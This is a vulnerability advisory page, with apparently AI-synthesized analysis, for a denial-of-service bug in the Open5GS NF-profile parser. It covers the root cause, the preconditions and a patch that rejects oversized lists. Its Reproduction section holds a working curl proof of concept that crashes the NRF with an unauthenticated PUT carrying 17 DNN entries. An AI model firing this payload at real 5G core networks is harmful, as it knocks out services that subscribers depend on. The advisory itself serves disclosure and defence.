CVE-2026-10115
Description
A vulnerability was identified in Open5GS up to 2.7.7. This affects an unknown part in the library lib/sbi/nnrf-handler.c of the component Shared NF-profile Parser. Such manipulation leads to denial of service. The attack can be launched remotely. The exploit is publicly available and might be used. It is advisable to implement a patch to correct this issue.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Open5GS up to v2.7.7 has a DoS vulnerability in the SBI NF-profile parser allowing remote crash via oversized DNN/TAC lists.
Vulnerability
In Open5GS versions up to and including v2.7.7, the shared NF-profile parser in lib/sbi/nnrf-handler.c contains two unbounded inner loops that handle smfInfo.sNssaiSmfInfoList[*].dnnSmfInfoList and amfInfo.taiRangeList[*].tacRangeList. When these lists exceed the internal fixed-size budgets (OGS_MAX_NUM_OF_DNN = 16 and OGS_MAX_NUM_OF_TAI = 16), the parser triggers an ogs_assert failure, crashing the process. The bug is reachable from multiple Open5GS network functions (NRF, AMF, AUSF, BSF, NSSF, PCF, SMF, UDM, UDR) through NF profile registration, NF status notifications, or discovery responses [1][2][3].
Exploitation
An attacker can remotely trigger the vulnerability by sending an HTTP/2 PUT request to the NRF's NF registration endpoint (/nnrf-nfm/v1/nf-instances/{nfInstanceId}) with a crafted JSON payload containing more than 16 DNN entries in a DNN list or more than 16 TAC ranges in a TaiRange list. No authentication is required for this path. The exploit is publicly available [2][3].
Impact
Successful exploitation causes the targeted Open5GS network function (e.g., NRF) to crash with a SIGABRT, leading to a denial of service (DoS). The attack can disrupt 5G core network operations, affecting all dependent services.
Mitigation
The fix is implemented in pull request #4527, which introduces two-tier defense: pre-validation in the NRF register path (rejecting oversized lists with HTTP 400) and graceful cap-and-break in the shared parser for other callers. Users should update to a patched version beyond v2.7.7 [1]. No official patched release date is mentioned, but the PR is merged into the main branch.
- [NRF/SBI] Reject overflowing NFProfile inner lists with HTTP 400; cap parser by MrBrownieCGN · Pull Request #4527 · open5gs/open5gs
- [Bug]: Shared NF-profile parser crashes on oversized `smfInfo.sNssaiSmfInfoList[*].dnnSmfInfoList`
- [Bug]: Shared NF-profile parser crashes on oversized `smfInfo.sNssaiSmfInfoList[*].dnnSmfInfoList`
AI Insight generated on May 30, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing bounds check on attacker-controlled inner-list lengths in the shared NF-profile parser causes an assertion failure and process abort."
Attack vector
An attacker with network access to the NRF can send a crafted HTTP/2 PUT request to the `/nnrf-nfm/v1/nf-instances/{nfInstanceId}` endpoint with an `smfInfo.sNssaiSmfInfoList[*].dnnSmfInfoList` containing more than 16 DNN entries [ref_id=2]. The shared parser hits `ogs_assert(dnn_index < OGS_MAX_NUM_OF_DNN)` at `lib/sbi/nnrf-handler.c:434`, which aborts the NRF process (exit code 139) and terminates the HTTP/2 stream, causing a denial of service [ref_id=2][ref_id=3]. The same handler is also reachable from other NF-profile parsing paths such as nf-status-notify and discovery responses consumed by other Open5GS network functions [ref_id=2].
Affected code
The bug resides in the shared NF-profile parser at `lib/sbi/nnrf-handler.c`. Two unbounded inner loops in `handle_smf_info()` (line 434) and `handle_amf_info()` (line 796) crash the NRF with SIGABRT when a peer-supplied NF registration carries more than `OGS_MAX_NUM_OF_DNN` (16) DNN entries per S-NSSAI slice or more than `OGS_MAX_NUM_OF_TAI` (16) TAC ranges per `amfInfo TaiRange` [ref_id=1][ref_id=2].
What the fix does
The patch introduces a two-tier defence [ref_id=1]. Tier 1 adds a pre-validation helper `nfprofile_inner_lists_overflow()` in the NRF register path (`src/nrf/nnrf-handler.c`) that rejects oversized `dnnSmfInfoList` or `tacRangeList` with HTTP 400 Bad Request before the shared parser is reached. Tier 2 converts the assertions in `lib/sbi/nnrf-handler.c` into a graceful cap-and-break so that other callers (NF-Set discovery responses, notification consumers) do not crash on oversized data. This ensures the process never aborts on peer-controlled NF-profile data.
Preconditions
- networkAttacker must be able to send HTTP/2 requests to the NRF's NF-instance registration endpoint.
- inputAttacker must supply an NFProfile with more than 16 DNN entries in `smfInfo.sNssaiSmfInfoList[*].dnnSmfInfoList` (or more than 16 TAC ranges in `amfInfo.taiRangeList[*].tacRangeList`).
Reproduction
```bash NRF_IP=$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' nrf) payload=$(cat <<'EOF' {"nfInstanceId":"fake-smf-nrf","nfType":"SMF","nfStatus":"REGISTERED","smfInfo":{"sNssaiSmfInfoList":[{"sNssai":{"sst":1,"sd":"000001"},"dnnSmfInfoList":[{"dnn":"d0"},{"dnn":"d1"},{"dnn":"d2"},{"dnn":"d3"},{"dnn":"d4"},{"dnn":"d5"},{"dnn":"d6"},{"dnn":"d7"},{"dnn":"d8"},{"dnn":"d9"},{"dnn":"d10"},{"dnn":"d11"},{"dnn":"d12"},{"dnn":"d13"},{"dnn":"d14"},{"dnn":"d15"},{"dnn":"d16"}]}]}} EOF ) curl --http2-prior-knowledge -m 5 -sS -i \ -X PUT "http://$NRF_IP/nnrf-nfm/v1/nf-instances/fake-smf-nrf" \ -H 'content-type: application/json' \ --data "$payload" ``` The NRF process exits with code 139 and logs: `FATAL: handle_smf_info: Assertion 'dnn_index < OGS_MAX_NUM_OF_DNN' failed. (../lib/sbi/nnrf-handler.c:434)` [ref_id=2][ref_id=3].
Generated on May 30, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
6News mentions
0No linked articles in our index yet.